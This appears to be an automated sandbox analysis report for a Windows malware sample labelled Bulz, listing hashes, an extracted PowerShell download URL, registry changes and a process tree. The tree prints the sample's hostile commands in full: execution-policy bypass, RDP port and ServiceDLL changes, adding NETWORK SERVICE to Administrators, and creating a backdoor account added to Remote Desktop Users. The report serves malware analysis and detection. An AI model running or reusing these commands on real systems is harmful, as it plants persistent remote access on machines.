Analysis
- max time kernel: 40s
- max time network: 150s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 06-03-2021 06:53
Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
  Resource: win10v20201028
General
- Target: SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
- Size: 4.6MB
- MD5: d6f9cf363d1cdbf8c076f9198e19df01
- SHA1: b70fe14eef9aa33bd33068514e192f259802c5f1
- SHA256: 6f7c097945c1602bbae27e4664004cf2139e66226f54b9499df311bdab804ebb
- SHA512: 373962c1533835c6b490310a3a7ae99d6cca22359017499dc9c607a2a06c373a34b55d2ac472c85596f76ac233e87f530ff21cd2b80b916554fbbf6fb7cee1a7
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow | pid | process
  16 | 4040 | powershell.exe
  18 | 4040 | powershell.exe
  19 | 4040 | powershell.exe
  20 | 4040 | powershell.exe
  22 | 4040 | powershell.exe
  24 | 4040 | powershell.exe
  26 | 4040 | powershell.exe
  28 | 4040 | powershell.exe
  30 | 4040 | powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Processes:
  resource | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
- Loads dropped DLL (2 IoCs)
  Processes:
  pid | process
  3920 |
  3920 |
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description | ioc | process
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5mx5v14f.ovv.psm1 | powershell.exe
  File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECA8.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED57.tmp | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED26.tmp | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED56.tmp | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1u4v1pdn.amt.ps1 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIED36.tmp | powershell.exe
- Delays execution with timeout.exe (1 IoCs)
  Processes:
  pid | process
  4592 | timeout.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description | flow | ioc
  HTTP User-Agent header | 20 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 22 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 18 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 19 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes:
  pid | process
  2464 | powershell.exe
  2464 | powershell.exe
  2464 | powershell.exe
  1884 | powershell.exe
  1884 | powershell.exe
  1884 | powershell.exe
  3916 | powershell.exe
  3916 | powershell.exe
  3916 | powershell.exe
  4432 | powershell.exe
  4432 | powershell.exe
  4432 | powershell.exe
  2464 | powershell.exe
  2464 | powershell.exe
  2464 | powershell.exe
  4040 | powershell.exe
  4040 | powershell.exe
  4040 | powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid | process
  612 |
  612 |
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2464 | powershell.exe
  Token: SeDebugPrivilege | 1884 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 1884 | powershell.exe
  Token: SeSecurityPrivilege | 1884 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 1884 | powershell.exe
  Token: SeLoadDriverPrivilege | 1884 | powershell.exe
  Token: SeSystemProfilePrivilege | 1884 | powershell.exe
  Token: SeSystemtimePrivilege | 1884 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 1884 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 1884 | powershell.exe
  Token: SeCreatePagefilePrivilege | 1884 | powershell.exe
  Token: SeBackupPrivilege | 1884 | powershell.exe
  Token: SeRestorePrivilege | 1884 | powershell.exe
  Token: SeShutdownPrivilege | 1884 | powershell.exe
  Token: SeDebugPrivilege | 1884 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 1884 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 1884 | powershell.exe
  Token: SeUndockPrivilege | 1884 | powershell.exe
  Token: SeManageVolumePrivilege | 1884 | powershell.exe
  Token: 33 | 1884 | powershell.exe
  Token: 34 | 1884 | powershell.exe
  Token: 35 | 1884 | powershell.exe
  Token: 36 | 1884 | powershell.exe
  Token: SeDebugPrivilege | 3916 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3916 | powershell.exe
  Token: SeSecurityPrivilege | 3916 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 3916 | powershell.exe
  Token: SeLoadDriverPrivilege | 3916 | powershell.exe
  Token: SeSystemProfilePrivilege | 3916 | powershell.exe
  Token: SeSystemtimePrivilege | 3916 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 3916 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 3916 | powershell.exe
  Token: SeCreatePagefilePrivilege | 3916 | powershell.exe
  Token: SeBackupPrivilege | 3916 | powershell.exe
  Token: SeRestorePrivilege | 3916 | powershell.exe
  Token: SeShutdownPrivilege | 3916 | powershell.exe
  Token: SeDebugPrivilege | 3916 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 3916 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 3916 | powershell.exe
  Token: SeUndockPrivilege | 3916 | powershell.exe
  Token: SeManageVolumePrivilege | 3916 | powershell.exe
  Token: 33 | 3916 | powershell.exe
  Token: 34 | 3916 | powershell.exe
  Token: 35 | 3916 | powershell.exe
  Token: 36 | 3916 | powershell.exe
  Token: SeDebugPrivilege | 4432 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 4432 | powershell.exe
  Token: SeSecurityPrivilege | 4432 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 4432 | powershell.exe
  Token: SeLoadDriverPrivilege | 4432 | powershell.exe
  Token: SeSystemProfilePrivilege | 4432 | powershell.exe
  Token: SeSystemtimePrivilege | 4432 | powershell.exe
  Token: SeProfSingleProcessPrivilege | 4432 | powershell.exe
  Token: SeIncBasePriorityPrivilege | 4432 | powershell.exe
  Token: SeCreatePagefilePrivilege | 4432 | powershell.exe
  Token: SeBackupPrivilege | 4432 | powershell.exe
  Token: SeRestorePrivilege | 4432 | powershell.exe
  Token: SeShutdownPrivilege | 4432 | powershell.exe
  Token: SeDebugPrivilege | 4432 | powershell.exe
  Token: SeSystemEnvironmentPrivilege | 4432 | powershell.exe
  Token: SeRemoteShutdownPrivilege | 4432 | powershell.exe
  Token: SeUndockPrivilege | 4432 | powershell.exe
  Token: SeManageVolumePrivilege | 4432 | powershell.exe
  Token: 33 | 4432 | powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
  description | pid | process | target process
  PID 4688 wrote to memory of 2464 | 4688 | SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe | powershell.exe
  PID 4688 wrote to memory of 2464 | 4688 | SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe | powershell.exe
  PID 2464 wrote to memory of 796 | 2464 | powershell.exe | csc.exe
  PID 2464 wrote to memory of 796 | 2464 | powershell.exe | csc.exe
  PID 796 wrote to memory of 364 | 796 | csc.exe | cvtres.exe
  PID 796 wrote to memory of 364 | 796 | csc.exe | cvtres.exe
  PID 2464 wrote to memory of 1236 | 2464 | powershell.exe | csc.exe
  PID 2464 wrote to memory of 1236 | 2464 | powershell.exe | csc.exe
  PID 1236 wrote to memory of 1312 | 1236 | csc.exe | cvtres.exe
  PID 1236 wrote to memory of 1312 | 1236 | csc.exe | cvtres.exe
  PID 2464 wrote to memory of 1884 | 2464 | powershell.exe | powershell.exe
  PID 2464 wrote to memory of 1884 | 2464 | powershell.exe | powershell.exe
  PID 2464 wrote to memory of 3916 | 2464 | powershell.exe | powershell.exe
  PID 2464 wrote to memory of 3916 | 2464 | powershell.exe | powershell.exe
  PID 2464 wrote to memory of 4432 | 2464 | powershell.exe | powershell.exe
  PID 2464 wrote to memory of 4432 | 2464 | powershell.exe | powershell.exe
  PID 2464 wrote to memory of 4200 | 2464 | powershell.exe | reg.exe
  PID 2464 wrote to memory of 4200 | 2464 | powershell.exe | reg.exe
  PID 2464 wrote to memory of 4620 | 2464 | powershell.exe | reg.exe
  PID 2464 wrote to memory of 4620 | 2464 | powershell.exe | reg.exe
  PID 2464 wrote to memory of 1180 | 2464 | powershell.exe | reg.exe
  PID 2464 wrote to memory of 1180 | 2464 | powershell.exe | reg.exe
  PID 2464 wrote to memory of 4400 | 2464 | powershell.exe | net.exe
  PID 2464 wrote to memory of 4400 | 2464 | powershell.exe | net.exe
  PID 4400 wrote to memory of 4568 | 4400 | net.exe | net1.exe
  PID 4400 wrote to memory of 4568 | 4400 | net.exe | net1.exe
  PID 2464 wrote to memory of 2932 | 2464 | powershell.exe | cmd.exe
  PID 2464 wrote to memory of 2932 | 2464 | powershell.exe | cmd.exe
  PID 2932 wrote to memory of 2260 | 2932 | cmd.exe | cmd.exe
  PID 2932 wrote to memory of 2260 | 2932 | cmd.exe | cmd.exe
  PID 2260 wrote to memory of 984 | 2260 | cmd.exe | net.exe
  PID 2260 wrote to memory of 984 | 2260 | cmd.exe | net.exe
  PID 984 wrote to memory of 4596 | 984 | net.exe | net1.exe
  PID 984 wrote to memory of 4596 | 984 | net.exe | net1.exe
  PID 2464 wrote to memory of 4256 | 2464 | powershell.exe | cmd.exe
  PID 2464 wrote to memory of 4256 | 2464 | powershell.exe | cmd.exe
  PID 4256 wrote to memory of 1352 | 4256 | cmd.exe | cmd.exe
  PID 4256 wrote to memory of 1352 | 4256 | cmd.exe | cmd.exe
  PID 1352 wrote to memory of 2164 | 1352 | cmd.exe | net.exe
  PID 1352 wrote to memory of 2164 | 1352 | cmd.exe | net.exe
  PID 2164 wrote to memory of 2052 | 2164 | net.exe | net1.exe
  PID 2164 wrote to memory of 2052 | 2164 | net.exe | net1.exe
  PID 3464 wrote to memory of 3588 | 3464 | cmd.exe | net.exe
  PID 3464 wrote to memory of 3588 | 3464 | cmd.exe | net.exe
  PID 3588 wrote to memory of 4144 | 3588 | net.exe | net1.exe
  PID 3588 wrote to memory of 4144 | 3588 | net.exe | net1.exe
  PID 416 wrote to memory of 3156 | 416 | cmd.exe | net.exe
  PID 416 wrote to memory of 3156 | 416 | cmd.exe | net.exe
  PID 3156 wrote to memory of 3428 | 3156 | net.exe | net1.exe
  PID 3156 wrote to memory of 3428 | 3156 | net.exe | net1.exe
  PID 3832 wrote to memory of 3424 | 3832 | cmd.exe | net.exe
  PID 3832 wrote to memory of 3424 | 3832 | cmd.exe | net.exe
  PID 3424 wrote to memory of 2264 | 3424 | net.exe | net1.exe
  PID 3424 wrote to memory of 2264 | 3424 | net.exe | net1.exe
  PID 4852 wrote to memory of 796 | 4852 | cmd.exe | net.exe
  PID 4852 wrote to memory of 796 | 4852 | cmd.exe | net.exe
  PID 796 wrote to memory of 1120 | 796 | net.exe | net1.exe
  PID 796 wrote to memory of 1120 | 796 | net.exe | net1.exe
  PID 2080 wrote to memory of 1412 | 2080 | cmd.exe | net.exe
  PID 2080 wrote to memory of 1412 | 2080 | cmd.exe | net.exe
  PID 1412 wrote to memory of 1264 | 1412 | net.exe | net1.exe
  PID 1412 wrote to memory of 1264 | 1412 | net.exe | net1.exe
  PID 1556 wrote to memory of 1560 | 1556 | cmd.exe | net.exe
  PID 1556 wrote to memory of 1560 | 1556 | cmd.exe | net.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
    Command: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D5.tmp" "c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\CSC6C4D9FC6F68E48DCBD114890A44A2246.TMP"
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87C3.tmp" "c:\Users\Admin\AppData\Local\Temp\zowv1r1s\CSCC53057A6C714A0B9B24DD4662F9C538.TMP"
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\reg.exe
        Command: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        Command: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        Command: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        Command: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          Command: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          Command: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            Command: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              Command: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          Command: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            Command: net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              Command: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  [2] C:\Windows\system32\cmd.exe
      Command: C:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
    [3] C:\Windows\system32\timeout.exe
        Command: timeout -n t
        - Delays execution with timeout.exe
[1] C:\Windows\System32\cmd.exe
    Command: cmd /C net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      Command: net.exe user WgaUtilAcc 000000 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
[1] C:\Windows\System32\cmd.exe
    Command: cmd /C net.exe user WgaUtilAcc jODpYwzb /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      Command: net.exe user WgaUtilAcc jODpYwzb /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        Command: C:\Windows\system32\net1 user WgaUtilAcc jODpYwzb /add
[1] C:\Windows\System32\cmd.exe
    Command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
